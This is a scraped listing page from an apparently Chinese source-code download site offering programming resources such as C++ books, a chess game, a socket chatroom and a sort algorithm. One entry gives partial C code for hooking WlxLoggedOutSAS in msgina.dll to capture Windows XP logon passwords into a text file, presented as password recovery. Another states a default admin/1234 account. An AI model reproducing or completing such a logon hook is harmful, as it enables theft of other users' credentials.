-
这是一个讲述C和C++标准库的文档,很详细,也很容易理解,还是中文档的...
这是一个讲述C和C++标准库的文档,很详细,也很容易理解,还是中文档的-This is a talk about C and C++ Standard library documentation, very detailed and also very easy to understand, or in documents
- 2022-02-03 08:38:54下载
- 积分:1
-
中国象棋游戏的源代码包,智力可选择,有详细的说明
中国象棋游戏的源代码包,智力可选择,有详细的说明-Chinese chess game source code package, and intelligence to choose, there are detailed instructions
- 2023-06-06 05:20:03下载
- 积分:1
-
for Socket programming ,as a simple chatroom,or TCP transmission client
为Socket编程,实现简单的聊天室功能,为Tcp传输的客户端-for Socket programming ,as a simple chatroom,or TCP transmission client
- 2022-02-06 02:50:44下载
- 积分:1
-
非常好的一本C++书籍!对于初学者很有帮助
非常好的一本C++书籍!对于初学者很有帮助-A very good C++ Programming Book for the new learners!
- 2022-01-28 08:31:56下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
讲述的是VC怎样制作系统托盘,对新手有很好的参考意义
讲述的是VC怎样制作系统托盘,对新手有很好的参考意义-Is the VC about how to make the system tray, the novice have a good reference value
- 2022-01-28 14:31:26下载
- 积分:1
-
dshow+mfc来捕捉摄像头视频数据
在directshow架构下用mfc+vc6来开发,捕捉摄像头的视频数据流,可以进行一帧一帧数据的处理,进行保存,预览,效果处理
- 2022-04-17 19:42:06下载
- 积分:1
-
此为在线招聘管理系统,具体操作里面有详细的word文档说明,管理员帐户为admin,密码为1234。...
此为在线招聘管理系统,具体操作里面有详细的word文档说明,管理员帐户为admin,密码为1234。-for this online recruitment management system, the specific operation with a detailed note of the word document, Administrator account for the admin password to 1234.-This is the online recruitment management system, specific operations which have detailed documentation of the word, the administrator account is admin, password is 1234.-for this online recruitment management system, the specific operation with a detailed note of the word document, Administrator account for the admin password to 1234.
- 2022-08-25 10:24:38下载
- 积分:1
-
基数排序算法的实现
the implementation of radix sort algorithm
- 2022-12-12 10:45:03下载
- 积分:1
-
把你的电话给苹果
Make your phone to Apple
- 2022-03-26 14:41:07下载
- 积分:1